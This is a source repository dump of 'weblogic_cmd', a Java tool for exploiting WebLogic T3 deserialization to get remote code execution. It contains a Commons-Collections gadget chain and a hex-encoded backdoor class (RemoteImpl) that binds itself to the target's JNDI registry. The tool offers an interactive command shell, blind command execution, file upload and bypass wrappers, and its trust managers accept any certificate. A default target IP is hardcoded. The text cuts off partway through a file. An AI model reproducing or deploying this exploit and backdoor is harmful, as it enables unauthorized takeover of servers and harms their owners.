Repository: 5up3rc/weblogic_cmd
Branch: master
Commit: 2b78744a3c7b
Files: 39
Total size: 55.8 MB
Directory structure:
gitextract_xf0mq9cb/
├── .idea/
│ ├── artifacts/
│ │ └── weblogic_cmd_jar.xml
│ ├── description.html
│ ├── excludeFromValidation.xml
│ ├── libraries/
│ │ ├── commons_cli_1_4.xml
│ │ ├── commons_collections_3_1.xml
│ │ ├── jsafeFIPS.xml
│ │ ├── wlcipher.xml
│ │ └── wlfullclient.xml
│ ├── misc.xml
│ ├── modules.xml
│ ├── project-template.xml
│ └── uiDesigner.xml
├── README.md
├── lib/
│ ├── commons-cli-1.4.jar
│ ├── commons-collections-3.1.jar
│ ├── jsafeFIPS.jar
│ ├── wlcipher.jar
│ └── wlfullclient.jar
├── src/
│ ├── META-INF/
│ │ └── MANIFEST.MF
│ ├── com/
│ │ └── supeream/
│ │ ├── Main.java
│ │ ├── payload/
│ │ │ ├── PayloadTest.java
│ │ │ └── RemoteImpl.java
│ │ ├── serial/
│ │ │ ├── BytesOperation.java
│ │ │ ├── Reflections.java
│ │ │ ├── SerialDataGenerator.java
│ │ │ └── Serializables.java
│ │ ├── ssl/
│ │ │ ├── SocketFactory.java
│ │ │ ├── TrustManagerImpl.java
│ │ │ └── WeblogicTrustManager.java
│ │ └── weblogic/
│ │ ├── BypassPayloadSelector.java
│ │ ├── ObjectTest.java
│ │ ├── T3ProtocolOperation.java
│ │ ├── T3Test.java
│ │ └── WebLogicOperation.java
│ └── weblogic/
│ ├── jms/
│ │ └── common/
│ │ └── StreamMessageImpl.java
│ ├── security/
│ │ └── utils/
│ │ ├── SSLSetup.java
│ │ └── SSLTrustValidator.java
│ └── socket/
│ └── ChannelSSLSocketFactory.java
└── weblogic_cmd.iml
================================================
FILE CONTENTS
================================================
================================================
FILE: .idea/artifacts/weblogic_cmd_jar.xml
================================================
$PROJECT_DIR$/out/artifacts/weblogic_cmd_jar
================================================
FILE: .idea/description.html
================================================
Simple Java application that includes a class with main() method
================================================
FILE: .idea/excludeFromValidation.xml
================================================
================================================
FILE: .idea/libraries/commons_cli_1_4.xml
================================================
================================================
FILE: .idea/libraries/commons_collections_3_1.xml
================================================
================================================
FILE: .idea/libraries/jsafeFIPS.xml
================================================
================================================
FILE: .idea/libraries/wlcipher.xml
================================================
================================================
FILE: .idea/libraries/wlfullclient.xml
================================================
================================================
FILE: .idea/misc.xml
================================================
================================================
FILE: .idea/modules.xml
================================================
================================================
FILE: .idea/project-template.xml
================================================
IJ_BASE_PACKAGE
================================================
FILE: .idea/uiDesigner.xml
================================================
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
================================================
FILE: README.md
================================================
# weblogic_cmd
weblogic t3 deserialization rce
1. 直接通过加载字节码的方式来加载class,执行无文件生成。通过绑定rmi来实现回显。
2. 支持t3s
3. 支持StreamMessageImpl,MarshalledObject绕过
使用说明:
-H 远程目标主机
-P 远程目标端口
-C 需要执行的命令
-T 可选的绕过方式
-U 删除绑定的rmi实例
-B 通过payload直接调用系统命令-针对没法回显的情况下使用
-os 指定目标操作系统
-https 使用tls的指定
-shell 以shell的方式展现
-upload 上传文件 需要配合-src -dst
-src 需要上传的文件路径
-dst 需要上传文件至目标的路径
-noExecPath 在某些没有/bin/bash 或者cmd.exe情况下使用
================================================
FILE: lib/wlfullclient.jar
================================================
[File too large to display: 55.6 MB]
================================================
FILE: src/META-INF/MANIFEST.MF
================================================
Manifest-Version: 1.0
Main-Class: com.supeream.Main
================================================
FILE: src/com/supeream/Main.java
================================================
package com.supeream;
import com.supeream.serial.BytesOperation;
import com.supeream.ssl.WeblogicTrustManager;
import com.supeream.weblogic.WebLogicOperation;
import org.apache.commons.cli.*;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.jndi.Environment;
import weblogic.utils.encoders.BASE64Encoder;
import javax.naming.Context;
import javax.naming.NamingException;
import java.io.FileNotFoundException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Scanner;
public class Main {
public static final String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
public static String TYPE = "streamMessageImpl";
public static List types = Arrays.asList(new String[]{"marshall", "collection", "streamMessageImpl"});
public static String version;
public static CommandLine cmdLine;
private static String cmd = "whoami";
public static Context getInitialContext(String url) throws NamingException, FileNotFoundException {
Environment environment = new Environment();
environment.setProviderUrl(url);
environment.setEnableServerAffinity(false);
environment.setSSLClientTrustManager(new WeblogicTrustManager());
return environment.getInitialContext();
}
public static boolean checkIsAlreadyInstalled(String host, String port) {
try {
System.out.println("检查是否安装rmi实例");
Context initialContext = getInitialContext(converUrl(host, port));
ClusterMasterRemote remoteCode = (ClusterMasterRemote) initialContext.lookup("supeream");
System.out.println("rmi已经安装");
invokeRmi(remoteCode);
return true;
} catch (Exception e) {
if (e.getMessage() !=null && e.getMessage().contains("supeream")) {
System.out.println("rmi实例不存在");
} else {
e.printStackTrace();
// System.exit(0);
}
}
return false;
}
public static void executeBlind(String host, String port) throws Exception {
if (cmdLine.hasOption("B") && cmdLine.hasOption("C")) {
System.out.println("执行命令:" + cmdLine.getOptionValue("C"));
WebLogicOperation.blindExecute(host, port, cmdLine.getOptionValue("C"));
System.out.println("执行blind命令完成");
System.exit(0);
}
}
public static String converUrl(String host, String port) {
if (cmdLine.hasOption("https")) {
return "t3s://" + host + ":" + port;
} else {
return "t3://" + host + ":" + port;
}
}
private static String cdConcat(List cds) {
StringBuffer stringBuffer = new StringBuffer();
for (String cd: cds) {
stringBuffer.append(cd);
stringBuffer.append("&&");
}
return stringBuffer.toString();
}
public static void invokeRmi(ClusterMasterRemote remoteCode) throws Exception {
String result = null;
if (Main.cmdLine.hasOption("shell")) {
Scanner scanner = new Scanner(System.in);
List cacheCmds = new ArrayList();
while (true) {
System.out.print("please input cmd:>");
cmd = scanner.nextLine();
if (cmd.equalsIgnoreCase("exit")) {
System.exit(0);
}
if (cmd.startsWith("cd ")) {
cacheCmds.add(cmd);
}
if (cmd.equalsIgnoreCase("clear")) {
cacheCmds.clear();
continue;
}
if (cmd.equalsIgnoreCase("back")) {
cacheCmds.remove(cacheCmds.size()-1);
continue;
}
String newCmd = cdConcat(cacheCmds);
if (!cmd.startsWith("cd ")) {
newCmd += cmd;
} else if (newCmd.length()>3){
newCmd = newCmd.substring(0, newCmd.length()-2);
}
if (Main.cmdLine.hasOption("noExecPath")) {
result = remoteCode.getServerLocation("showmecode$NO$"+newCmd);
} else {
result = remoteCode.getServerLocation("showmecode"+newCmd);
}
System.out.println(result);
}
} else {
System.out.println("执行命令:" + cmd);
if (Main.cmdLine.hasOption("noExecPath")) {
result = remoteCode.getServerLocation("showmecode$NO$"+cmd);
} else {
result = remoteCode.getServerLocation("showmecode"+cmd);
}
System.out.println(result);
}
}
public static void main(String[] args) {
System.setProperty("weblogic.security.allowCryptoJDefaultJCEVerification", "true");
System.setProperty("weblogic.security.allowCryptoJDefaultPRNG", "true");
System.setProperty("weblogic.security.SSL.ignoreHostnameVerification", "true");
System.setProperty("weblogic.security.TrustKeyStore", "DemoTrust");
Options options = new Options();
options.addOption("H", true, "Remote Host[need set]");
options.addOption("P", true, "Remote Port[need set]");
options.addOption("C", true, "Execute Command[need set]");
options.addOption("T", true, "Payload Type" + types);
options.addOption("U", false, "Uninstall rmi");
options.addOption("B", false, "Runtime Blind Execute Command maybe you should select os type");
options.addOption("os", true, "Os Type [windows,linux]");
options.addOption("https", false, "enable https or tls");
options.addOption("shell", false, "enable shell module");
options.addOption("upload", false, "enable upload a file");
options.addOption("src", true, "path to src file ");
options.addOption("dst", true, "path to dst file ");
options.addOption("noExecPath", false, "custom execute path");
try {
String host = "202.60.207.169";
String port = "7001";
CommandLineParser parser = new DefaultParser();
cmdLine = parser.parse(options, args);
if (cmdLine.hasOption("H")) {
host = cmdLine.getOptionValue("H");
} else {
HelpFormatter formatter = new HelpFormatter();
formatter.printHelp("supeream", options);
System.exit(0);
}
if (cmdLine.hasOption("P")) {
port = cmdLine.getOptionValue("P");
}
if (cmdLine.hasOption("C")) {
cmd = cmdLine.getOptionValue("C");
}
if (cmdLine.hasOption("T")) {
TYPE = cmdLine.getOptionValue("T");
}
if (cmdLine.hasOption("U")) {
System.out.println("开始删除rmi实例");
WebLogicOperation.unInstallRmi(host, port);
System.out.println("后门删除实例");
System.exit(0);
}
executeBlind(host, port);
if (Main.cmdLine.hasOption("upload") && Main.cmdLine.hasOption("src") && Main.cmdLine.hasOption("dst")) {
System.out.println("开始上传文件");
String path = Main.cmdLine.getOptionValue("src");
byte[] fileContent = BytesOperation.GetByteByFile(path);
WebLogicOperation.uploadFile(host, port, Main.cmdLine.getOptionValue("dst"), fileContent);
System.out.println("file upload success");
System.exit(0);
}
if (checkIsAlreadyInstalled(host, port)) {
System.exit(0);
}
System.out.println("开始安装rmi实例");
WebLogicOperation.installRmi(host, port);
System.out.println("等待rmi实例安装成功 ");
Thread.sleep(2000);
Context initialContext = getInitialContext(converUrl(host, port));
ClusterMasterRemote remoteCode = (ClusterMasterRemote) initialContext.lookup("supeream");
invokeRmi(remoteCode);
} catch (Exception e) {
System.out.println("实例安装失败");
String msg = e.getMessage();
if (msg != null && msg.contains("Unrecognized option")) {
HelpFormatter formatter = new HelpFormatter();
formatter.printHelp("supeream", options);
} else {
System.out.println("实例rmi安装失败 请切换-OB模式");
e.printStackTrace();
}
}
}
}
================================================
FILE: src/com/supeream/payload/PayloadTest.java
================================================
package com.supeream.payload;
import com.supeream.serial.BytesOperation;
import sun.org.mozilla.javascript.internal.DefiningClassLoader;
/**
* Created by nike on 17/7/3.
*/
public class PayloadTest {
public static void main(String[] args) throws Exception {
// byte[] iRemoteCode = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/supeream/payload/IRemote.class");
// System.out.println(BytesOperation.bytesToHexString(iRemoteCode));
DefiningClassLoader definingClassLoader = new DefiningClassLoader();
// Class cls = definingClassLoader.defineClass("com.supeream.payload.IRemote",iRemoteCode);
byte[] remoteCodeImpl = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/supeream/payload/RemoteImpl.class");
System.out.println(BytesOperation.bytesToHexString(remoteCodeImpl));
Class cls_ = definingClassLoader.defineClass("com.supeream.payload.RemoteImpl", remoteCodeImpl);
Class.forName("com.supeream.payload.RemoteImpl");
System.out.println(cls_);
}
}
================================================
FILE: src/com/supeream/payload/RemoteImpl.java
================================================
package com.supeream.payload;
import sun.tools.asm.TryData;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.utils.encoders.BASE64Decoder;
import javax.naming.Context;
import javax.naming.InitialContext;
import java.io.BufferedReader;
import java.io.FileOutputStream;
import java.io.InputStreamReader;
import java.rmi.RemoteException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
/**
* Created by nike on 17/6/27.
*/
public class RemoteImpl implements ClusterMasterRemote {
public static void main(String[] args) {
try {
RemoteImpl remote = new RemoteImpl();
if (args.length == 2 && args[0].equalsIgnoreCase("blind")) {
remote.getServerLocation(args[1]);
} else if (args.length == 1) {
Context ctx = new InitialContext();
if (args[0].equalsIgnoreCase("install")) {
ctx.rebind("supeream", remote);
} else if (args[0].equalsIgnoreCase("uninstall")) {
ctx.unbind("supeream");
}
}
} catch (Exception e) {
}
}
@Override
public void setServerLocation(String cmd, String args) throws RemoteException {
}
public static void uploadFile(String path, byte[] content) {
try {
FileOutputStream fileOutputStream = new FileOutputStream(path);
fileOutputStream.write(content);
fileOutputStream.flush();
fileOutputStream.close();
}catch (Exception e) {
}
}
@Override
public String getServerLocation(String cmd) throws RemoteException {
try {
if (!cmd.startsWith("showmecode")) {
return "guess me?";
} else {
cmd = cmd.substring(10);
}
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null && osTyp.toLowerCase().contains("win")) {
isLinux = false;
}
List cmds = new ArrayList();
if (cmd.startsWith("$NO$")) {
cmds.add(cmd.substring(4));
}else if (isLinux) {
cmds.add("/bin/bash");
cmds.add("-c");
cmds.add(cmd);
} else {
cmds.add("cmd.exe");
cmds.add("/c");
cmds.add(cmd);
}
ProcessBuilder processBuilder = new ProcessBuilder(cmds);
processBuilder.redirectErrorStream(true);
Process proc = processBuilder.start();
BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
StringBuffer sb = new StringBuffer();
String line;
while ((line = br.readLine()) != null) {
sb.append(line).append("\n");
}
return sb.toString();
} catch (Exception e) {
return e.getMessage();
}
}
}
================================================
FILE: src/com/supeream/serial/BytesOperation.java
================================================
package com.supeream.serial;
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
import java.io.FileInputStream;
public class BytesOperation {
public static byte[] hexStringToBytes(String hexString) {
if (hexString != null && !hexString.equals("")) {
hexString = hexString.toUpperCase();
int length = hexString.length() / 2;
char[] hexChars = hexString.toCharArray();
byte[] d = new byte[length];
for (int i = 0; i < length; ++i) {
int pos = i * 2;
d[i] = (byte) (charToByte(hexChars[pos]) << 4 | charToByte(hexChars[pos + 1]));
}
return d;
} else {
return null;
}
}
private static byte charToByte(char c) {
return (byte) "0123456789ABCDEF".indexOf(c);
}
public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) {
byte[] byte_3 = new byte[byte_1.length + byte_2.length];
System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length);
System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length);
return byte_3;
}
public static String bytesToHexString(byte[] src) {
StringBuilder stringBuilder = new StringBuilder("");
if (src == null || src.length <= 0) {
return null;
}
for (int i = 0; i < src.length; i++) {
int v = src[i] & 0xFF;
String hv = Integer.toHexString(v);
if (hv.length() < 2) {
stringBuilder.append(0);
}
stringBuilder.append(hv);
}
return stringBuilder.toString();
}
public static byte[] GetByteByFile(String FilePath) throws Exception {
FileInputStream fi = new FileInputStream(FilePath);
byte[] temp = new byte[50000000];
int length = fi.read(temp);
byte[] file = new byte[length];
for (int i = 0; i < length; ++i) {
file[i] = temp[i];
}
fi.close();
return file;
}
public static void main(String[] args) throws Exception {
System.out.println(BytesOperation.bytesToHexString(BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/lib/remote.jar")));
}
}
================================================
FILE: src/com/supeream/serial/Reflections.java
================================================
package com.supeream.serial;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
public class Reflections {
public static Field getField(final Class clazz, final String fieldName) throws Exception {
Field field = clazz.getDeclaredField(fieldName);
if (field == null && clazz.getSuperclass() != null) {
field = getField(clazz.getSuperclass(), fieldName);
}
field.setAccessible(true);
return field;
}
public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
final Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
final Field field = getField(obj.getClass(), fieldName);
return field.get(obj);
}
public static Constructor getFirstCtor(final String name) throws Exception {
final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0];
ctor.setAccessible(true);
return ctor;
}
}
================================================
FILE: src/com/supeream/serial/SerialDataGenerator.java
================================================
package com.supeream.serial;
import com.supeream.weblogic.BypassPayloadSelector;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.mozilla.classfile.DefiningClassLoader;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
/**
* Created by nike on 17/7/3.
*/
public class SerialDataGenerator {
private static final String REMOTE = "com.supeream.payload.RemoteImpl";
private static final String remoteHex = "cafebabe0000003200d10a003500720700730a000200720800740a007500760a000200770700780a0007007208007908007a0b007b007c08007d0b007b007e07007f0700800a000f00810a000f00820a000f00830a000f00840800850a007500860800870a007500880800890a008a008b0a0075008c08008d0a0075008e07008f0a001d00720800900b009100920800930800940800950800960700970a002500980a002500990a0025009a07009b07009c0a009d009e0a002a009f0a002900a00700a10a002e00720a002900a20a002e00a30800a40a002e00a50a000e00a60700a70700a80100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100214c636f6d2f737570657265616d2f7061796c6f61642f52656d6f7465496d706c3b0100046d61696e010016285b4c6a6176612f6c616e672f537472696e673b29560100036374780100164c6a617661782f6e616d696e672f436f6e746578743b01000672656d6f7465010001650100154c6a6176612f6c616e672f457863657074696f6e3b010004617267730100135b4c6a6176612f6c616e672f537472696e673b01000d537461636b4d61705461626c650700730700a907007f0100117365745365727665724c6f636174696f6e010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f537472696e673b2956010003636d640100124c6a6176612f6c616e672f537472696e673b01000a457863657074696f6e730700aa01000a75706c6f616446696c65010017284c6a6176612f6c616e672f537472696e673b5b42295601001066696c654f757470757453747265616d01001a4c6a6176612f696f2f46696c654f757470757453747265616d3b01000470617468010007636f6e74656e740100025b420100116765745365727665724c6f636174696f6e010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b01000262720100184c6a6176612f696f2f42756666657265645265616465723b01000273620100184c6a6176612f6c616e672f537472696e674275666665723b0100046c696e650100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b0700ab0700ac0700970700ad07009b0700a101000a536f7572636546696c6501000f52656d6f7465496d706c2e6a6176610c0037003801001f636f6d2f737570657265616d2f7061796c6f61642f52656d6f7465496d706c010005626c696e640700ab0c00ae00af0c0058005901001b6a617661782f6e616d696e672f496e697469616c436f6e74657874010007696e7374616c6c010008737570657265616d0700a90c00b000b1010009756e696e7374616c6c0c00b200b30100136a6176612f6c616e672f457863657074696f6e0100186a6176612f696f2f46696c654f757470757453747265616d0c003700b30c00b400b50c00b600380c00b7003801000a73686f776d65636f64650c00b800af0100096775657373206d653f0c00b900ba0100076f732e6e616d650700bb0c00bc00590c00bd00be01000377696e0c00bf00c00100136a6176612f7574696c2f41727261794c697374010004244e4f240700ac0c00c100c20100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c003700c30c00c400c50c00c600c70100166a6176612f696f2f42756666657265645265616465720100196a6176612f696f2f496e70757453747265616d5265616465720700ad0c00c800c90c003700ca0c003700cb0100166a6176612f6c616e672f537472696e674275666665720c00cc00be0c00cd00ce0100010a0c00cf00be0c00d000be0100106a6176612f6c616e672f4f626a65637401002e7765626c6f6769632f636c75737465722f73696e676c65746f6e2f436c75737465724d617374657252656d6f74650100146a617661782f6e616d696e672f436f6e746578740100186a6176612f726d692f52656d6f7465457863657074696f6e0100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100116a6176612f6c616e672f50726f63657373010010657175616c7349676e6f726543617365010015284c6a6176612f6c616e672f537472696e673b295a010006726562696e64010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b2956010006756e62696e64010015284c6a6176612f6c616e672f537472696e673b29560100057772697465010005285b422956010005666c757368010005636c6f736501000a73746172747357697468010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b0100106a6176612f6c616e672f53797374656d01000b67657450726f706572747901000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b01000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b010018284c6a6176612f696f2f496e70757453747265616d3b2956010013284c6a6176612f696f2f5265616465723b2956010008726561644c696e65010006617070656e6401002c284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275666665723b010008746f537472696e6701000a6765744d6573736167650021000200350001003600000005000100370038000100390000002f00010001000000052ab70001b100000002003a00000006000100000015003b0000000c000100000005003c003d00000009003e003f00010039000000f90003000300000061bb000259b700034c2abe05a000192a03321204b6000599000e2b2a0432b6000657a7003b2abe04a00035bb000759b700084d2a03321209b6000599000f2c120a2bb9000b0300a700162a0332120cb6000599000b2c120ab9000d0200a700044cb100010000005c005f000e0003003a00000032000c0000001a0008001c0019001d0024001e002a001f00320020003d00210049002200540023005c0028005f002600600029003b0000002a00040032002a004000410002000800540042003d000100600000004300440001000000610045004600000047000000160005fc0024070048fc0024070049f900124207004a000001004b004c000200390000003f0000000300000001b100000002003a0000000600010000002f003b00000020000300000001003c003d000000000001004d004e0001000000010045004e0002004f00000004000100500009005100520001003900000090000300030000001bbb000f592ab700104d2c2bb600112cb600122cb60013a700044db10001000000160019000e0003003a0000001e00070000003300090034000e0035001200360016003900190037001a003a003b0000002a00040009000d005300540002001a00000043004400020000001b0055004e00000000001b00560057000100470000000700025907004a0000010058005900020039000002540005000a000000ee2b1214b600159a00061216b02b100ab600174c043d1218b800194e2dc600112db6001a121bb6001c990005033dbb001d59b7001e3a042b121fb6001599001319042b07b60017b90020020057a700441c99002319041221b9002002005719041222b9002002005719042bb90020020057a7002019041223b9002002005719041224b9002002005719042bb90020020057bb0025591904b700263a05190504b60027571905b600283a06bb002959bb002a591906b6002bb7002cb7002d3a07bb002e59b7002f3a081907b60030593a09c6001319081909b600311232b6003157a7ffe81908b60033b04d2cb60034b000020000000b00e8000e000c00e700e8000e0004003a0000006e001b0000004100090042000c00440013004700150048001b0049002b004a002d004d0036004f003f0050004f005100530052005d00530067005400730056007d0057008700580090005b009b005c00a2005d00a9005f00be006000c7006300d2006400e2006700e8006800e90069003b00000070000b001500d3005a005b0002001b00cd005c004e0003003600b2005d005e0004009b004d005f0060000500a9003f00610062000600be002a00630064000700c7002100650066000800cf00190067004e000900e90005004300440002000000ee003c003d0000000000ee004d004e000100680000000c0001003600b2005d0069000400470000004800080cfd00200107006afc002107006b231cff0036000907004807006a0107006a07006b07006c07006d07006e07006f0000fc001a07006aff0005000207004807006a000107004a004f000000040001005000010070000000020071";
private static byte[] serialData(Transformer[] transformers) throws Exception {
final Transformer transformerChain = new ChainedTransformer(transformers);
final Map innerMap = new HashMap();
// 初始化map 设置laymap
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
InvocationHandler handler = (InvocationHandler) Reflections
.getFirstCtor(
"sun.reflect.annotation.AnnotationInvocationHandler")
.newInstance(Override.class, lazyMap);
final Map mapProxy = Map.class
.cast(Proxy.newProxyInstance(SerialDataGenerator.class.getClassLoader(),
new Class[]{Map.class}, handler));
handler = (InvocationHandler) Reflections.getFirstCtor(
"sun.reflect.annotation.AnnotationInvocationHandler")
.newInstance(Override.class, mapProxy);
Object _handler = BypassPayloadSelector.selectBypass(handler);
return Serializables.serialize(_handler);
}
private static Transformer[] defineAndLoadPayloadTransformerChain(String className, byte[] clsData, String[] bootArgs) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(DefiningClassLoader.class),
new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}),
new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}),
new InvokerTransformer("defineClass",
new Class[]{String.class, byte[].class}, new Object[]{className, clsData}),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"main", new Class[]{String[].class}}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{bootArgs}}),
new ConstantTransformer(new HashSet())};
return transformers;
}
private static Transformer[] uploadTransformerChain(String className, byte[] clsData, String filePath, byte[] content) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(DefiningClassLoader.class),
new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}),
new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}),
new InvokerTransformer("defineClass",
new Class[]{String.class, byte[].class}, new Object[]{className, clsData}),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"uploadFile", new Class[]{String.class, byte[].class}}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{filePath, content}}),
new ConstantTransformer(new HashSet())};
return transformers;
}
private static Transformer[] blindExecutePayloadTransformerChain(String[] execArgs) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{
String.class, Class[].class}, new Object[]{
"getRuntime", new Class[0]}),
new InvokerTransformer("invoke", new Class[]{
Object.class, Object[].class}, new Object[]{
null, new Object[0]}),
new InvokerTransformer("exec",
new Class[]{String[].class}, new Object[]{execArgs}),
new ConstantTransformer(new HashSet())};
return transformers;
}
public static byte[] serialRmiDatas(String[] bootArgs) throws Exception {
return serialData(defineAndLoadPayloadTransformerChain(SerialDataGenerator.REMOTE, BytesOperation.hexStringToBytes(SerialDataGenerator.remoteHex), bootArgs));
}
public static byte[] serialBlindDatas(String[] execArgs) throws Exception {
return serialData(blindExecutePayloadTransformerChain(execArgs));
}
public static byte[] serialUploadDatas(String filePath, byte[] content) throws Exception {
return serialData(uploadTransformerChain(SerialDataGenerator.REMOTE, BytesOperation.hexStringToBytes(SerialDataGenerator.remoteHex), filePath, content));
}
}
================================================
FILE: src/com/supeream/serial/Serializables.java
================================================
package com.supeream.serial;
import java.io.*;
public class Serializables {
public static byte[] serialize(final Object obj) throws IOException {
final ByteArrayOutputStream out = new ByteArrayOutputStream();
serialize(obj, out);
return out.toByteArray();
}
public static void serialize(final Object obj, final OutputStream out) throws IOException {
final ObjectOutputStream objOut = new ObjectOutputStream(out);
objOut.writeObject(obj);
objOut.flush();
objOut.close();
}
public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
return deserialize(in);
}
public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
final ObjectInputStream objIn = new ObjectInputStream(in);
return objIn.readObject();
}
}
================================================
FILE: src/com/supeream/ssl/SocketFactory.java
================================================
package com.supeream.ssl;
import com.supeream.Main;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import java.net.Socket;
import java.security.SecureRandom;
/**
* Created by nike on 17/6/29.
*/
public class SocketFactory {
private SocketFactory() {
}
public static Socket newSocket(String host, int port) throws Exception {
Socket socket = null;
if (Main.cmdLine.hasOption("https")) {
SSLContext context = SSLContext.getInstance("SSL");
// 初始化
context.init(null,
new TrustManager[]{new TrustManagerImpl()},
new SecureRandom());
SSLSocketFactory factory = context.getSocketFactory();
socket = factory.createSocket(host, port);
} else {
socket = new Socket(host, port);
}
return socket;
}
}
================================================
FILE: src/com/supeream/ssl/TrustManagerImpl.java
================================================
package com.supeream.ssl;
import javax.net.ssl.X509TrustManager;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
/**
* Created by nike on 17/6/29.
*/
public class TrustManagerImpl implements X509TrustManager {
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
}
@Override
public X509Certificate[] getAcceptedIssuers() {
return null;
}
}
================================================
FILE: src/com/supeream/ssl/WeblogicTrustManager.java
================================================
package com.supeream.ssl;
import weblogic.security.SSL.TrustManager;
import java.security.cert.X509Certificate;
/**
* Created by nike on 17/6/29.
*/
public class WeblogicTrustManager implements TrustManager {
@Override
public boolean certificateCallback(X509Certificate[] x509Certificates, int i) {
return true;
}
}
================================================
FILE: src/com/supeream/weblogic/BypassPayloadSelector.java
================================================
package com.supeream.weblogic;
import com.supeream.Main;
import com.supeream.serial.Serializables;
import weblogic.corba.utils.MarshalledObject;
import weblogic.jms.common.StreamMessageImpl;
import java.io.IOException;
/**
* Created by nike on 17/6/26.
*/
public class BypassPayloadSelector {
private static Object marshalledObject(Object payload) {
MarshalledObject marshalledObject = null;
try {
marshalledObject = new MarshalledObject(payload);
} catch (IOException e) {
e.printStackTrace();
}
return marshalledObject;
}
public static Object streamMessageImpl(byte[] object) throws Exception {
StreamMessageImpl streamMessage = new StreamMessageImpl();
streamMessage.setDataBuffer(object, object.length);
return streamMessage;
}
public static Object selectBypass(Object payload) throws Exception {
if (Main.TYPE.equalsIgnoreCase("marshall")) {
payload = marshalledObject(payload);
} else if (Main.TYPE.equalsIgnoreCase("streamMessageImpl")) {
payload = streamMessageImpl(Serializables.serialize(payload));
}
return payload;
}
}
================================================
FILE: src/com/supeream/weblogic/ObjectTest.java
================================================
package com.supeream.weblogic;
import com.supeream.serial.BytesOperation;
import java.io.*;
/**
* Created by nike on 17/7/11.
*/
public class ObjectTest {
public static void main(String[] args) throws Exception {
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeUTF("xxx");
String xx = BytesOperation.bytesToHexString(byteArrayOutputStream.toByteArray());
System.out.println(xx);
byte[] cons = BytesOperation.hexStringToBytes(xx);
ByteArrayInputStream bis = new ByteArrayInputStream(cons);
